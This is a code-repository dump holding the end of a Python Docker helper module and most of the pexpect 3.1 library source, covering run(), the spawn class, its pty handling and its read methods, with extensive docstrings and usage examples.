raise ValidationError(not_found_error_msg)
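# Illustrative sketch with hypothetical Dockerfile contents: the first line
# matching each predicate is split on whitespace, and the second token is
# what _get_base_img() and _get_container_port() ultimately return.
def _example_dockerfile_parsing():
    lines = ['FROM python:2.7', 'EXPOSE 5000', 'CMD ["python", "app.py"]']
    base_img = next(l for l in lines if l.startswith(FROM_CMD)).split()[1]
    port = next(l for l in lines if l.startswith(EXPOSE_CMD)).split()[1]
    return base_img, port  # ('python:2.7', '5000')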
def _is_tag_specified(img_name):
return ':' in img_name
def _get_env_opts(envvars_map):
return _get_opts(envvars_map, '--env', '{}={}')
def _get_volume_opts(volume_map):
return _get_opts(volume_map, '-v', '{}:{}')
def _get_opts(_map, opt_name, val_format):
_map = _map or {}
kv_pairs = six.iteritems(_map)
return utils.flatten([[opt_name, val_format.format(k, v)] for k, v
in kv_pairs])
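# Minimal sketch of the option expansion above (illustrative values): each
# map entry becomes an (option, formatted-value) pair on the docker CLI.
def _example_cli_opts():
    env_opts = _get_env_opts({'RACK_ENV': 'dev'})   # ['--env', 'RACK_ENV=dev']
    vol_opts = _get_volume_opts({'/host': '/ctr'})  # ['-v', '/host:/ctr']
    return env_opts, vol_opts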
def _run_quiet(args):
try:
return utils.exec_cmd_quiet(args)
except CommandError as e:
_handle_command_error(e)
def _run_live(args):
try:
return utils.exec_cmd_live_output(args)
except CommandError as e:
_handle_command_error(e)
def _handle_command_error(e):
socket_perm_msg = "dial unix /var/run/docker.sock: permission denied."
if socket_perm_msg in e.output:
raise CommandError(strings['local.run.socketperms'], e.output, e.code)
else:
raise CommandError
| mit |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/pexpect/__init__.py | 1 | 83018 | '''Pexpect is a Python module for spawning child applications and controlling
them automatically. Pexpect can be used for automating interactive applications
such as ssh, ftp, passwd, telnet, etc. It can be used to automate setup
scripts for duplicating software package installations on different servers. It
can be used for automated software testing. Pexpect is in the spirit of Don
Libes' Expect, but Pexpect is pure Python. Other Expect-like modules for Python
require TCL and Expect or require C extensions to be compiled. Pexpect does not
use C, Expect, or TCL extensions. It should work on any platform that supports
the standard Python pty module. The Pexpect interface focuses on ease of use so
that simple tasks are easy.
There are two main interfaces to the Pexpect system; these are the function,
run() and the class, spawn. The spawn class is more powerful. The run()
function is simpler than spawn, and is good for quickly calling a program. When
you call the run() function it executes a given program and then returns the
output. This is a handy replacement for os.system().
For example::
pexpect.run('ls -la')
The spawn class is the more powerful interface to the Pexpect system. You can
use this to spawn a child program then interact with it by sending input and
expecting responses (waiting for patterns in the child's output).
For example::
child = pexpect.spawn('scp foo [email protected]:.')
child.expect('Password:')
child.sendline(mypassword)
This works even for commands that ask for passwords or other input outside of
the normal stdio streams. For example, ssh reads input directly from the TTY
device which bypasses stdin.
Credits: Noah Spurrier, Richard Holden, Marco Molteni, Kimberley Burchett,
Robert Stone, Hartmut Goebel, Chad Schroeder, Erick Tryzelaar, Dave Kirby, Ids
vander Molen, George Todd, Noel Taylor, Nicolas D. Cesar, Alexander Gattin,
Jacques-Etienne Baudoux, Geoffrey Marshall, Francisco Lourenco, Glen Mabey,
Karthik Gurusamy, Fernando Perez, Corey Minyard, Jon Cohen, Guillaume
Chazarain, Andrew Ryan, Nick Craig-Wood, Andrew Stone, Jorgen Grahn, John
Spiegel, Jan Grant, and Shane Kerr. Let me know if I forgot anyone.
Pexpect is free, open source, and all that good stuff.
http://pexpect.sourceforge.net/
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
try:
import os
import sys
import time
import select
import re
import struct
import resource
import types
import pty
import tty
import termios
import fcntl
import errno
import traceback
import signal
import codecs
except ImportError: # pragma: no cover
err = sys.exc_info()[1]
raise ImportError(str(err) + '''
A critical module was not found. Probably this operating system does not
support it. Pexpect is intended for UNIX-like operating systems.''')
__version__ = '3.1'
__revision__ = ''
__all__ = ['ExceptionPexpect', 'EOF', 'TIMEOUT', 'spawn', 'spawnu', 'run', 'runu',
'which', 'split_command_line', '__version__', '__revision__']
PY3 = (sys.version_info[0] >= 3)
# Exception classes used by this module.
class ExceptionPexpect(Exception):
'''Base class for all exceptions raised by this module.
'''
def __init__(self, value):
super(ExceptionPexpect, self).__init__(value)
self.value = value
def __str__(self):
return str(self.value)
def get_trace(self):
'''This returns an abbreviated stack trace with lines that only concern
the caller. In other words, the stack trace inside the Pexpect module
is not included. '''
tblist = traceback.extract_tb(sys.exc_info()[2])
tblist = [item for item in tblist if 'pexpect/__init__' not in item[0]]
tblist = traceback.format_list(tblist)
return ''.join(tblist)
class EOF(ExceptionPexpect):
'''Raised when EOF is read from a child.
This usually means the child has exited.'''
class TIMEOUT(ExceptionPexpect):
'''Raised when a read time exceeds the timeout. '''
##class TIMEOUT_PATTERN(TIMEOUT):
## '''Raised when the pattern match time exceeds the timeout.
## This is different than a read TIMEOUT because the child process may
## give output, thus never give a TIMEOUT, but the output
## may never match a pattern.
## '''
##class MAXBUFFER(ExceptionPexpect):
## '''Raised when a buffer fills before matching an expected pattern.'''
def run(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None):
'''
This function runs the given command; waits for it to finish; then
returns all output as a string. STDERR is included in output. If the full
path to the command is not given then the path is searched.
Note that lines are terminated by a CR/LF (\\r\\n) combination even on
UNIX-like systems because this is the standard for pseudottys. If you set
'withexitstatus' to true, then run will return a tuple of (command_output,
exitstatus). If 'withexitstatus' is false then this returns just
command_output.
The run() function can often be used instead of creating a spawn instance.
For example, the following code uses spawn::
from pexpect import *
child = spawn('scp foo [email protected]:.')
child.expect('(?i)password')
child.sendline(mypassword)
The previous code can be replaced with the following::
from pexpect import *
run('scp foo [email protected]:.', events={'(?i)password': mypassword})
**Examples**
Start the apache daemon on the local machine::
from pexpect import *
run("/usr/local/apache/bin/apachectl start")
Check in a file using SVN::
from pexpect import *
run("svn ci -m 'automatic commit' my_file.py")
Run a command and capture exit status::
from pexpect import *
(command_output, exitstatus) = run('ls -l /bin', withexitstatus=1)
The following will run SSH and execute 'ls -l' on the remote machine. The
password 'secret' will be sent if the '(?i)password' pattern is ever seen::
run("ssh [email protected] 'ls -l'",
events={'(?i)password':'secret\\n'})
This will start mencoder to rip a video from DVD. This will also display
progress ticks every 5 seconds as it runs. For example::
from pexpect import *
def print_ticks(d):
print d['event_count'],
run("mencoder dvd://1 -o video.avi -oac copy -ovc copy",
events={TIMEOUT:print_ticks}, timeout=5)
The 'events' argument should be a dictionary of patterns and responses.
Whenever one of the patterns is seen in the command output, run() will send
the associated response string. Note that you should put newlines in your
string if Enter is necessary. The responses may also contain callback
functions. Any callback is a function that takes a dictionary as an argument.
The dictionary contains all the locals from the run() function, so you can
access the child spawn object or any other variable defined in run()
(event_count, child, and extra_args are the most useful). A callback may
return True to stop the current run process; otherwise run() continues until
the next event. A callback may also return a string which will be sent to
the child. 'extra_args' is not used directly by run(). It provides a way to
pass data to a callback function via the locals dictionary that run()
passes to the callback.
'''
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawn)
def runu(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None, **kwargs):
"""This offers the same interface as :func:`run`, but using unicode.
Like :class:`spawnu`, you can pass ``encoding`` and ``errors`` parameters,
which will be used for both input and output.
"""
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawnu, **kwargs)
def _run(command, timeout, withexitstatus, events, extra_args, logfile, cwd,
env, _spawn, **kwargs):
if timeout == -1:
child = _spawn(command, maxread=2000, logfile=logfile, cwd=cwd, env=env,
**kwargs)
else:
child = _spawn(command, timeout=timeout, maxread=2000, logfile=logfile,
cwd=cwd, env=env, **kwargs)
if events is not None:
patterns = list(events.keys())
responses = list(events.values())
else:
# This assumes EOF or TIMEOUT will eventually cause run to terminate.
patterns = None
responses = None
child_result_list = []
event_count = 0
while True:
try:
index = child.expect(patterns)
if isinstance(child.after, child.allowed_string_types):
child_result_list.append(child.before + child.after)
else:
# child.after may have been a TIMEOUT or EOF,
# which we don't want appended to the list.
child_result_list.append(child.before)
if isinstance(responses[index], child.allowed_string_types):
child.send(responses[index])
elif isinstance(responses[index], types.FunctionType):
callback_result = responses[index](locals())
sys.stdout.flush()
if isinstance(callback_result, child.allowed_string_types):
child.send(callback_result)
elif callback_result:
break
else:
raise TypeError('The callback must be a string or function.')
event_count = event_count + 1
except TIMEOUT:
child_result_list.append(child.before)
break
except EOF:
child_result_list.append(child.before)
break
child_result = child.string_type().join(child_result_list)
if withexitstatus:
child.close()
return (child_result, child.exitstatus)
else:
return child_result
class spawn(object):
'''This is the main class interface for Pexpect. Use this class to start
and control child applications. '''
string_type = bytes
if PY3:
allowed_string_types = (bytes, str)
@staticmethod
def _chr(c):
return bytes([c])
linesep = os.linesep.encode('ascii')
@staticmethod
def write_to_stdout(b):
try:
return sys.stdout.buffer.write(b)
except AttributeError:
# If stdout has been replaced, it may not have .buffer
return sys.stdout.write(b.decode('ascii', 'replace'))
else:
allowed_string_types = (basestring,) # analysis:ignore
_chr = staticmethod(chr)
linesep = os.linesep
write_to_stdout = sys.stdout.write
encoding = None
def __init__(self, command, args=[], timeout=30, maxread=2000,
searchwindowsize=None, logfile=None, cwd=None, env=None,
ignore_sighup=True):
'''This is the constructor. The command parameter may be a string that
includes a command and any arguments to the command. For example::
child = pexpect.spawn('/usr/bin/ftp')
child = pexpect.spawn('/usr/bin/ssh [email protected]')
child = pexpect.spawn('ls -latr /tmp')
You may also construct it with a list of arguments like so::
child = pexpect.spawn('/usr/bin/ftp', [])
child = pexpect.spawn('/usr/bin/ssh', ['[email protected]'])
child = pexpect.spawn('ls', ['-latr', '/tmp'])
After this the child application will be created and will be ready to
talk to. For normal use, see expect() and send() and sendline().
Remember that Pexpect does NOT interpret shell meta characters such as
redirect, pipe, or wild cards (``>``, ``|``, or ``*``). This is a
common mistake. If you want to run a command and pipe it through
another command then you must also start a shell. For example::
child = pexpect.spawn('/bin/bash -c "ls -l | grep LOG > logs.txt"')
child.expect(pexpect.EOF)
The second form of spawn (where you pass a list of arguments) is useful
in situations where you wish to spawn a command and pass it its own
argument list. This can make syntax more clear. For example, the
following is equivalent to the previous example::
shell_cmd = 'ls -l | grep LOG > logs.txt'
child = pexpect.spawn('/bin/bash', ['-c', shell_cmd])
child.expect(pexpect.EOF)
The maxread attribute sets the read buffer size. This is the maximum number
of bytes that Pexpect will try to read from a TTY at one time. Setting
the maxread size to 1 will turn off buffering. Setting the maxread
value higher may help performance in cases where large amounts of
output are read back from the child. This feature is useful in
conjunction with searchwindowsize.
The searchwindowsize attribute sets how far back in the incoming
search buffer Pexpect will search for pattern matches. Every time
Pexpect reads some data from the child it will append the data to the
incoming buffer. The default is to search from the beginning of the
incoming buffer each time new data is read from the child. But this is
very inefficient if you are running a command that generates a large
amount of data where you want to match. The searchwindowsize does not
affect the size of the incoming data buffer. You will still have
access to the full buffer after expect() returns.
The logfile member turns on or off logging. All input and output will
be copied to the given file object. Set logfile to None to stop
logging. This is the default. Set logfile to sys.stdout to echo
everything to standard output. The logfile is flushed after each write.
Example log input and output to a file::
child = pexpect.spawn('some_command')
fout = open('mylog.txt', 'w')
child.logfile = fout
Example log to stdout::
child = pexpect.spawn('some_command')
child.logfile = sys.stdout
The logfile_read and logfile_send members can be used to separately log
the input from the child and output sent to the child. Sometimes you
don't want to see everything you write to the child. You only want to
log what the child sends back. For example::
child = pexpect.spawn('some_command')
child.logfile_read = sys.stdout
To separately log output sent to the child use logfile_send::
self.logfile_send = fout
If ``ignore_sighup`` is True, the child process will ignore SIGHUP
signals. For now, the default is True, to preserve the behaviour of
earlier versions of Pexpect, but you should pass this explicitly if you
want to rely on it.
The delaybeforesend helps overcome a weird behavior that many users
were experiencing. The typical problem was that a user would expect() a
"Password:" prompt and then immediately call sendline() to send the
password. The user would then see that their password was echoed back
to them. Passwords don't normally echo. The problem is caused by the
fact that most applications print out the "Password" prompt and then
turn off stdin echo, but if you send your password before the
application turned off echo, then you get your password echoed.
Normally this wouldn't be a problem when interacting with a human at a
real keyboard. If you introduce a slight delay just before writing then
this seems to clear up the problem. This was such a common problem for
many users that I decided that the default pexpect behavior should be
to sleep just before writing to the child application. 1/20th of a
second (50 ms) seems to be enough to clear up the problem. You can set
delaybeforesend to 0 to return to the old behavior. Most Linux machines
don't like this to be below 0.03. I don't know why.
Note that spawn is clever about finding commands on your path.
It uses the same logic that "which" uses to find executables.
If you wish to get the exit status of the child you must call the
close() method. The exit or signal status of the child will be stored
in self.exitstatus or self.signalstatus. If the child exited normally
then exitstatus will store the exit return code and signalstatus will
be None. If the child was terminated abnormally with a signal then
signalstatus will store the signal value and exitstatus will be None.
If you need more detail you can also read the self.status member which
stores the status returned by os.waitpid. You can interpret this using
os.WIFEXITED/os.WEXITSTATUS or os.WIFSIGNALED/os.WTERMSIG. '''
self.STDIN_FILENO = pty.STDIN_FILENO
self.STDOUT_FILENO = pty.STDOUT_FILENO
self.STDERR_FILENO = pty.STDERR_FILENO
self.stdin = sys.stdin
self.stdout = sys.stdout
self.stderr = sys.stderr
self.searcher = None
self.ignorecase = False
self.before = None
self.after = None
self.match = None
self.match_index = None
self.terminated = True
self.exitstatus = None
self.signalstatus = None
# status returned by os.waitpid
self.status = None
self.flag_eof = False
self.pid = None
# the child file descriptor is initially closed
self.child_fd = -1
self.timeout = timeout
self.delimiter = EOF
self.logfile = logfile
# input from child (read_nonblocking)
self.logfile_read = None
# output to send (send, sendline)
self.logfile_send = None
# max bytes to read at one time into buffer
self.maxread = maxread
# This is the read buffer. See maxread.
self.buffer = self.string_type()
# Data before searchwindowsize point is preserved, but not searched.
self.searchwindowsize = searchwindowsize
# Delay used before sending data to child. Time in seconds.
# Most Linux machines don't like this to be below 0.03 (30 ms).
self.delaybeforesend = 0.05
# Used by close() to give kernel time to update process status.
# Time in seconds.
self.delayafterclose = 0.1
# Used by terminate() to give kernel time to update process status.
# Time in seconds.
self.delayafterterminate = 0.1
self.softspace = False
self.name = '<' + repr(self) + '>'
self.closed = True
self.cwd = cwd
self.env = env
self.ignore_sighup = ignore_sighup
# This flags if we are running on irix
self.__irix_hack = (sys.platform.lower().find('irix') >= 0)
# Solaris uses internal __fork_pty(). All others use pty.fork().
if ((sys.platform.lower().find('solaris') >= 0)
or (sys.platform.lower().find('sunos5') >= 0)):
self.use_native_pty_fork = False
else:
self.use_native_pty_fork = True
# Support subclasses that do not use command or args.
if command is None:
self.command = None
self.args = None
self.name = '<pexpect factory incomplete>'
else:
self._spawn(command, args)
@staticmethod
def _coerce_expect_string(s):
if not isinstance(s, bytes):
return s.encode('ascii')
return s
@staticmethod
def _coerce_send_string(s):
if not isinstance(s, bytes):
return s.encode('utf-8')
return s
@staticmethod
def _coerce_read_string(s):
return s
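# Quick sketch (not part of the original module) of the coercion rules above:
# on the byte-oriented pty, expect patterns are encoded as ASCII, send()
# payloads as UTF-8, and bytes pass through untouched.
def _example_string_coercion():
    assert spawn._coerce_expect_string(u'prompt> ') == b'prompt> '
    assert spawn._coerce_send_string(u'caf\xe9') == b'caf\xc3\xa9'
    assert spawn._coerce_send_string(b'raw') == b'raw'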
def __del__(self):
'''This makes sure that no system resources are left open. Python only
garbage collects Python objects. OS file descriptors are not Python
objects, so they must be handled explicitly. If the child file
descriptor was opened outside of this class (passed to the constructor)
then this does not close it. '''
if not self.closed:
# It is possible for __del__ methods to execute during the
# teardown of the Python VM itself. Thus self.close() may
# trigger an exception because os.close may be None.
try:
self.close()
# which exception, shouldn't we catch explicitly .. ?
except:
pass
def __str__(self):
'''This returns a human-readable string that represents the state of
the object. '''
s = []
s.append(repr(self))
s.append('version: ' + __version__)
s.append('command: ' + str(self.command))
s.append('args: %r' % (self.args,))
s.append('searcher: %r' % (self.searcher,))
s.append('buffer (last 100 chars): %r' % (self.buffer)[-100:],)
s.append('before (last 100 chars): %r' % (self.before)[-100:],)
s.append('after: %r' % (self.after,))
s.append('match: %r' % (self.match,))
s.append('match_index: ' + str(self.match_index))
s.append('exitstatus: ' + str(self.exitstatus))
s.append('flag_eof: ' + str(self.flag_eof))
s.append('pid: ' + str(self.pid))
s.append('child_fd: ' + str(self.child_fd))
s.append('closed: ' + str(self.closed))
s.append('timeout: ' + str(self.timeout))
s.append('delimiter: ' + str(self.delimiter))
s.append('logfile: ' + str(self.logfile))
s.append('logfile_read: ' + str(self.logfile_read))
s.append('logfile_send: ' + str(self.logfile_send))
s.append('maxread: ' + str(self.maxread))
s.append('ignorecase: ' + str(self.ignorecase))
s.append('searchwindowsize: ' + str(self.searchwindowsize))
s.append('delaybeforesend: ' + str(self.delaybeforesend))
s.append('delayafterclose: ' + str(self.delayafterclose))
s.append('delayafterterminate: ' + str(self.delayafterterminate))
return '\n'.join(s)
def _spawn(self, command, args=[]):
'''This starts the given command in a child process. This does all the
fork/exec type of stuff for a pty. This is called by __init__. If args
is empty then command will be parsed (split on spaces) and args will be
set to parsed arguments. '''
# The pid and child_fd of this object get set by this method.
# Note that it is difficult for this method to fail.
# You cannot detect if the child process cannot start.
# So the only way you can tell if the child process started
# or not is to try to read from the file descriptor. If you get
# EOF immediately then it means that the child is already dead.
# That may not necessarily be bad because you may have spawned a child
# that performs some task; creates no stdout output; and then dies.
# If command is an int type then it may represent a file descriptor.
if isinstance(command, type(0)):
raise ExceptionPexpect('Command is an int type. ' +
'If this is a file descriptor then maybe you want to ' +
'use fdpexpect.fdspawn which takes an existing ' +
'file descriptor instead of a command string.')
if not isinstance(args, type([])):
raise TypeError('The argument, args, must be a list.')
if args == []:
self.args = split_command_line(command)
self.command = self.args[0]
else:
# Make a shallow copy of the args list.
self.args = args[:]
self.args.insert(0, command)
self.command = command
command_with_path = which(self.command)
if command_with_path is None:
raise ExceptionPexpect('The command was not found or was not ' +
'executable: %s.' % self.command)
self.command = command_with_path
self.args[0] = self.command
self.name = '<' + ' '.join(self.args) + '>'
assert self.pid is None, 'The pid member must be None.'
assert self.command is not None, 'The command member must not be None.'
if self.use_native_pty_fork:
try:
self.pid, self.child_fd = pty.fork()
except OSError:
err = sys.exc_info()[1]
raise ExceptionPexpect('pty.fork() failed: ' + str(err))
else:
# Use internal __fork_pty
self.pid, self.child_fd = self.__fork_pty()
if self.pid == 0:
# Child
try:
# used by setwinsize()
self.child_fd = sys.stdout.fileno()
self.setwinsize(24, 80)
# which exception, shouldn't we catch explicitly .. ?
except:
# Some platforms do not like setwinsize (Cygwin).
# This will cause problem when running applications that
# are very picky about window size.
# This is a serious limitation, but not a show stopper.
pass
# Do not allow child to inherit open file descriptors from parent.
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
for i in range(3, max_fd):
try:
os.close(i)
except OSError:
pass
if self.ignore_sighup:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
if self.cwd is not None:
os.chdir(self.cwd)
if self.env is None:
os.execv(self.command, self.args)
else:
os.execvpe(self.command, self.args, self.env)
# Parent
self.terminated = False
self.closed = False
def __fork_pty(self):
'''This implements a substitute for the forkpty system call. This
should be more portable than the pty.fork() function. Specifically,
this should work on Solaris.
Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
resolve the issue with Python's pty.fork() not supporting Solaris,
particularly ssh. Based on patch to posixmodule.c authored by Noah
Spurrier::
http://mail.python.org/pipermail/python-dev/2003-May/035281.html
'''
parent_fd, child_fd = os.openpty()
if parent_fd < 0 or child_fd < 0:
raise ExceptionPexpect("Could not open with os.openpty().")
pid = os.fork()
if pid < 0:
raise ExceptionPexpect("Failed os.fork().")
elif pid == 0:
# Child.
os.close(parent_fd)
self.__pty_make_controlling_tty(child_fd)
os.dup2(child_fd, 0)
os.dup2(child_fd, 1)
os.dup2(child_fd, 2)
if child_fd > 2:
os.close(child_fd)
else:
# Parent.
os.close(child_fd)
return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd):
'''This makes the pseudo-terminal the controlling tty. This should be
more portable than the pty.fork() function. Specifically, this should
work on Solaris. '''
child_name = os.ttyname(tty_fd)
# Disconnect from controlling tty. Harmless if not already connected.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
# which exception, shouldn't we catch explicitly .. ?
except:
# Already disconnected. This happens if running inside cron.
pass
os.setsid()
# Verify we are disconnected from controlling tty
# by attempting to open it again.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
raise ExceptionPexpect('Failed to disconnect from ' +
'controlling tty. It is still possible to open /dev/tty.')
# which exception, shouldn't we catch explicitly .. ?
except:
# Good! We are disconnected from a controlling tty.
pass
# Verify we can open child pty.
fd = os.open(child_name, os.O_RDWR)
if fd < 0:
raise ExceptionPexpect("Could not open child pty, " + child_name)
else:
os.close(fd)
# Verify we now have a controlling tty.
fd = os.open("/dev/tty", os.O_WRONLY)
if fd < 0:
raise ExceptionPexpect("Could not open controlling tty, /dev/tty")
else:
os.close(fd)
def fileno(self):
'''This returns the file descriptor of the pty for the child.
'''
return self.child_fd
def close(self, force=True):
'''This closes the connection with the child application. Note that
calling close() more than once is valid. This emulates standard Python
behavior with files. Set force to True if you want to make sure that
the child is terminated (SIGKILL is sent if the child ignores SIGHUP
and SIGINT). '''
if not self.closed:
self.flush()
os.close(self.child_fd)
# Give kernel time to update process status.
time.sleep(self.delayafterclose)
if self.isalive():
if not self.terminate(force):
raise ExceptionPexpect('Could not terminate the child.')
self.child_fd = -1
self.closed = True
#self.pid = None
def flush(self):
'''This does nothing. It is here to support the interface for a
File-like object. '''
pass
def isatty(self):
'''This returns True if the file descriptor is open and connected to a
tty(-like) device, else False. '''
return os.isatty(self.child_fd)
def waitnoecho(self, timeout=-1):
'''This waits until the terminal ECHO flag is set False. This returns
True if the echo mode is off. This returns False if the ECHO flag was
not set False before the timeout. This can be used to detect when the
child is waiting for a password. Usually a child application will turn
off echo mode when it is waiting for the user to enter a password. For
example, instead of expecting the "password:" prompt you can wait for
the child to set ECHO off::
p = pexpect.spawn('ssh [email protected]')
p.waitnoecho()
p.sendline(mypassword)
If timeout==-1 then this method will use the value in self.timeout.
If timeout==None then this method will block until the ECHO flag is False.
'''
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
while True:
if not self.getecho():
return True
if timeout is not None and timeout < 0:
return False
if timeout is not None:
timeout = end_time - time.time()
time.sleep(0.1)
def getecho(self):
'''This returns the terminal echo mode. This returns True if echo is
on or False if echo is off. Child applications that are expecting you
to enter a password often set ECHO False. See waitnoecho(). '''
attr = termios.tcgetattr(self.child_fd)
if attr[3] & termios.ECHO:
return True
return False
def setecho(self, state):
'''This sets the terminal echo mode on or off. Note that anything the
child sent before the echo will be lost, so you should be sure that
your input buffer is empty before you call setecho(). For example, the
following will work as expected::
p = pexpect.spawn('cat') # Echo is on by default.
p.sendline('1234') # We expect to see this twice from the child...
p.expect(['1234']) # ... once from the tty echo...
p.expect(['1234']) # ... and again from cat itself.
p.setecho(False) # Turn off tty echo
p.sendline('abcd') # We will see this only once (echoed by cat).
p.sendline('wxyz') # We will see this only once (echoed by cat).
p.expect(['abcd'])
p.expect(['wxyz'])
The following WILL NOT WORK because the lines sent before the setecho
will be lost::
p = pexpect.spawn('cat')
p.sendline('1234')
p.setecho(False) # Turn off tty echo
p.sendline('abcd') # We will see this only once (echoed by cat).
p.sendline('wxyz') # We will see this only once (echoed by cat).
p.expect(['1234'])
p.expect(['1234'])
p.expect(['abcd'])
p.expect(['wxyz'])
'''
attr = termios.tcgetattr(self.child_fd)
if state:
attr[3] = attr[3] | termios.ECHO
else:
attr[3] = attr[3] & ~termios.ECHO
# I tried TCSADRAIN and TCSAFLUSH, but
# these were inconsistent and blocked on some platforms.
# TCSADRAIN would probably be ideal if it worked.
termios.tcsetattr(self.child_fd, termios.TCSANOW, attr)
def _log(self, s, direction):
if self.logfile is not None:
self.logfile.write(s)
self.logfile.flush()
second_log = self.logfile_send if (direction=='send') else self.logfile_read
if second_log is not None:
second_log.write(s)
second_log.flush()
def read_nonblocking(self, size=1, timeout=-1):
'''This reads at most size characters from the child application. It
includes a timeout. If the read does not complete within the timeout
period then a TIMEOUT exception is raised. If the end of file is read
then an EOF exception will be raised. If a log file was set using
setlog() then all data will also be written to the log file.
If timeout is None then the read may block indefinitely.
If timeout is -1 then the self.timeout value is used. If timeout is 0
then the child is polled and if there is no data immediately ready
then this will raise a TIMEOUT exception.
The timeout refers only to the amount of time to read at least one
character. This is not affected by the 'size' parameter, so if you call
read_nonblocking(size=100, timeout=30) and only one character is
available right away then one character will be returned immediately.
It will not wait for 30 seconds for another 99 characters to come in.
This is a wrapper around os.read(). It uses select.select() to
implement the timeout. '''
if self.closed:
raise ValueError('I/O operation on closed file.')
if timeout == -1:
timeout = self.timeout
# Note that some systems such as Solaris do not give an EOF when
# the child dies. In fact, you can still try to read
# from the child_fd -- it will block forever or until TIMEOUT.
# For this case, I test isalive() before doing any reading.
# If isalive() is false, then I pretend that this is the same as EOF.
if not self.isalive():
# timeout of 0 means "poll"
r, w, e = self.__select([self.child_fd], [], [], 0)
if not r:
self.flag_eof = True
raise EOF('End Of File (EOF). Braindead platform.')
elif self.__irix_hack:
# Irix takes a long time before it realizes a child was terminated.
# FIXME So does this mean Irix systems are forced to always have
# FIXME a 2 second delay when calling read_nonblocking? That sucks.
r, w, e = self.__select([self.child_fd], [], [], 2)
if not r and not self.isalive():
self.flag_eof = True
raise EOF('End Of File (EOF). Slow platform.')
r, w, e = self.__select([self.child_fd], [], [], timeout)
if not r:
if not self.isalive():
# Some platforms, such as Irix, will claim that their
# processes are alive; timeout on the select; and
# then finally admit that they are not alive.
self.flag_eof = True
raise EOF('End of File (EOF). Very slow platform.')
else:
raise TIMEOUT('Timeout exceeded.')
if self.child_fd in r:
try:
s = os.read(self.child_fd, size)
except OSError:
# Linux does this
self.flag_eof = True
raise EOF('End Of File (EOF). Exception style platform.')
if s == b'':
# BSD style
self.flag_eof = True
raise EOF('End Of File (EOF). Empty string style platform.')
s = self._coerce_read_string(s)
self._log(s, 'read')
return s
raise ExceptionPexpect('Reached an unexpected state.')
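# Usage sketch (hypothetical helper, not part of the original class): drain
# whatever output is immediately available from a spawn instance. timeout=0
# polls, so TIMEOUT here simply means "no data right now".
def _example_drain_output(child):
    chunks = []
    while True:
        try:
            chunks.append(child.read_nonblocking(size=1024, timeout=0))
        except TIMEOUT:
            break
        except EOF:
            break
    return child.string_type().join(chunks)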
def read(self, size=-1):
'''This reads at most "size" bytes from the file (less if the read hits
EOF before obtaining size bytes). If the size argument is negative or
omitted, read all data until EOF is reached. The bytes are returned as
a string object. An empty string is returned when EOF is encountered
immediately. '''
if size == 0:
return self.string_type()
if size < 0:
# delimiter default is EOF
self.expect(self.delimiter)
return self.before
# I could have done this more directly by not using expect(), but
# I deliberately decided to couple read() to expect() so that
# I would catch any bugs early and ensure consistent behavior.
# It's a little less efficient, but there is less for me to
# worry about if I have to later modify read() or expect().
# Note that size is at least 1 here (the size == 0 and size < 0 cases
# returned above), so the '.{%d}' pattern below is always a valid regex.
cre = re.compile(self._coerce_expect_string('.{%d}' % size), re.DOTALL)
# delimiter default is EOF
index = self.expect([cre, self.delimiter])
if index == 0:
### FIXME self.before should be ''. Should I assert this?
return self.after
return self.before
def readline(self, size=-1):
'''This reads and returns one entire line. The newline at the end of
line is returned as part of the string, unless the file ends without a
newline. An empty string is returned if EOF is encountered immediately.
This looks for a newline as a CR/LF pair (\\r\\n) even on UNIX because
this is what the pseudotty device returns. So contrary to what you may
expect you will receive newlines as \\r\\n.
If the size argument is 0 then an empty string is returned. In all
other cases the size argument is ignored, which is not standard
behavior for a file-like object. '''
if size == 0:
return self.string_type()
# delimiter default is EOF
index = self.expect([b'\r\n', self.delimiter])
if index == 0:
return self.before + b'\r\n'
else:
return self.before
def __iter__(self):
'''This is to support iterators over a file-like object.
'''
return iter(self.readline, self.string_type())
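# Usage sketch (hypothetical, not part of the original class): because
# __iter__ wraps readline(), a spawn instance can be consumed line by line.
# Each line ends in b'\r\n' (the pty convention) and iteration stops at the
# empty string readline() returns once EOF has been reached.
def _example_iterate_lines():
    child = spawn('ls -1 /tmp')
    names = [line.rstrip() for line in child]
    child.close()
    return names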
def readlines(self, sizehint=-1):
'''This reads until EOF using readline() and returns a list containing
the lines thus read. The optional 'sizehint' argument is ignored.
Remember, because this reads until EOF that means the child
process should have closed its stdout. If you run this method on
a child that is still running with its stdout open then this
method will block until it times out.'''
lines = []
while True:
line = self.readline()
if not line:
break
lines.append(line)
return lines
